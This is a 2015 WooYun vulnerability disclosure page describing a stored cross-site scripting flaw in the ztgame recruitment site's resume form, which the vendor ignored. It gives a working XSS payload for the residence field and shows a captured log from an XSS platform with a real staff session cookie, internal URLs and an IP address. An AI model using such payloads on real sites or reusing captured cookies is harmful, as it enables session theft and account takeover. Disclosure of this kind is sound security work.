当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118162

漏洞标题:巨人网络某处XSS

相关厂商:巨人网络

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-04 11:10

修复时间:2015-06-09 11:12

公开时间:2015-06-09 11:12

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全
-----------------------------------------------
上次厂商说补 Rank 请补这个洞吧

详细说明:

巨人招聘网站:http://hr.ztgame.com/
注册一个账号后登陆后 点击个人简历 创建一份简历(当然 只能创建只是为了演示 之前已经用xss平台打到了)

1.png


2.png


如图 在当前居住地哪能插入XSS语句

"><img src=# onerror=alert(/wooyun/)><

点击保存后弹框

3.png


然后我们就带着xss的简历来申请职位吧(只是之前的申请记录)

4.png


打到的cookie

5.png


2015-06-04 10:02:19	
location : https://amt.ztgame.com/ztgame/zp/resumeview_out.jsp?resumeid=395578
toplocation : https://amt.ztgame.com/ztgame/zp/resumeview_out.jsp?resumeid=395578
cookie : JSESSIONID=5DECA51C434446B30A10EA77D80A6315
opener : https://amt.ztgame.com/ztgame/zp/selectresume.jsp?centerid=8a81817b251332c70125158a4139015f&jobid=59&kxnum=10&deptid=8a81817b251332c70125158c485a0169&stationid=8a81817b251332c70125169ff785075c
HTTP_REFERER :
HTTP_USER_AGENT : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
REMOTE_ADDR : 180.168.197.82


漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-09 11:12

厂商回复:

最新状态:

暂无